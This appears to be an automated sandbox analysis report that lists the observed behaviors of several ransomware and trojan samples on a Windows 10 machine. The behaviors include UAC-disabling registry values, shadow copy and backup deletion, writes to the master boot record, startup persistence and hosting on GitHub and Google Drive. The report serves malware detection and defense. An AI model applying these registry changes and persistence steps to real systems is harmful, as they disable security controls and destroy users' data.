Analysis Overview
Threat Level: Known bad
The file http://google.com was found to be: Known bad.
Malicious Activity Summary
Chaos
Chaos Ransomware
UAC bypass
Deletes shadow copies
Modifies boot configuration data using bcdedit
Manipulates Digital Signatures
Deletes backup catalog
Downloads MZ/PE file
Disables RegEdit via registry modification
Disables Task Manager via registry modification
Executes dropped EXE
Checks computer location settings
UPX packed file
Drops startup file
Reads user/profile data of web browsers
Drops desktop.ini file(s)
Writes to the Master Boot Record (MBR)
Legitimate hosting services abused for malware hosting/C2
Sets desktop wallpaper using registry
AutoIT Executable
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Program crash
Suspicious use of WriteProcessMemory
Suspicious use of SetWindowsHookEx
Views/modifies file attributes
Modifies Internet Explorer start page
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
Uses Task Scheduler COM API
Uses Volume Shadow Copy service COM API
Suspicious behavior: AddClipboardFormatListener
Runs ping.exe
Interacts with shadow copies
Kills process with taskkill
NTFS ADS
Modifies registry class
Modifies Internet Explorer settings
Suspicious use of FindShellTrayWindow
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Checks SCSI registry key(s)
Enumerates system info in registry
Suspicious use of AdjustPrivilegeToken
Modifies data under HKEY_USERS
Modifies registry key
Suspicious use of SendNotifyMessage
Checks processor information in registry
MITRE ATT&CK Matrix V13
Analysis: static1
Detonation Overview
Reported
2024-07-03 05:32
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-07-03 05:32
Reported
2024-07-03 05:44
Platform
win10v2004-20240611-en
Max time kernel
715s
Max time network
716s
Command Line
Signatures
Chaos
Chaos Ransomware
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\reg.exe | N/A |
Deletes shadow copies
Modifies boot configuration data using bcdedit
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
| N/A | N/A | C:\Windows\system32\bcdedit.exe | N/A |
Deletes backup catalog
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\wbadmin.exe | N/A |
Disables RegEdit via registry modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools = "1" | C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe | N/A |
Disables Task Manager via registry modification
Downloads MZ/PE file
Manipulates Digital Signatures
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.1!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_CA_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.2!7\Name = "szOID_ROOT_PROGRAM_AUTO_UPDATE_END_REVOCATION" | C:\Windows\SysWOW64\certutil.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Cryptography\OID\EncodingType 0\CryptDllFindOIDInfo\1.3.6.1.4.1.311.60.3.3!7\Name = "szOID_ROOT_PROGRAM_NO_OCSP_FAILOVER_TO_CRL" | C:\Windows\SysWOW64\certutil.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7D12.tmp\Cov29Cry.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Temp1_Covid29 Ransomware.zip\TrojanRansomCovid29.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\cmd.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.url | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\covid29-is-here.txt | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Drops desktop.ini file(s)
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-200405930-3877336739-3533750831-1000\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Desktop\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
| File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\7D12.tmp\mbr.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe | N/A |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\AppData\Local\Temp\Temp1_Sigma.zip\Sigma.exe | N/A |
AutoIT Executable
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\0gsi5uxfx.jpg" | C:\Users\Admin\AppData\Roaming\svchost.exe | N/A |
Enumerates physical storage devices
Event Triggered Execution: Accessibility Features
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 | C:\Windows\System32\vds.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\FriendlyName | C:\Windows\System32\vds.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | C:\Windows\System32\vds.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | C:\Windows\SysWOW64\bootcfg.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM\CENTRALPROCESSOR\0 | C:\Windows\SysWOW64\bootcfg.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\chkdsk.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | C:\Windows\SysWOW64\chkntfs.exe | N/A |
Interacts with shadow copies
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\vssadmin.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION | C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\Software\Microsoft\Internet Explorer\Toolbar | C:\Windows\explorer.exe | N/A |
Modifies Internet Explorer start page
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "https://www.youtube.com/@JhoPro" | C:\Users\Admin\AppData\Local\Temp\Temp1_GDI-Trojan.Win32.Lixo-by-ArTicZera-main.zip\GDI-Trojan.Win32.Lixo-by-ArTicZera-main\Lixo.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "205" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | C:\Windows\system32\LogonUI.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | C:\Windows\system32\LogonUI.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | C:\Windows\system32\LogonUI.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\MRUListEx = ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{80213E82-BCFD-4C4F-8817-BB27601267A9} | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02020202 | C:\Windows\explorer.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\WFlags = "0" | C:\Windows\explorer.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\1\MRUListEx = 00000000ffffffff | C:\Windows\explorer.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\껟â¾â€€è€€ | C:\Windows\system32\OpenWith.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-200405930-3877336739-3533750831-1000\{CF4986AB-31E7-4B35-AF79-CEE6F78E6AF9} | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\1\0\0 = 5a00310000000000e358092c100053797374656d33320000420009000400efbe874f7748e358092c2e000000b90c000000000100000000000000000000000000000073770e01530079007300740065006d0033003200000018000000 | C:\Windows\SysWOW64\certreq.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-200405930-3877336739-3533750831-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202020202 | C:\Windows\explorer.exe | N/A |
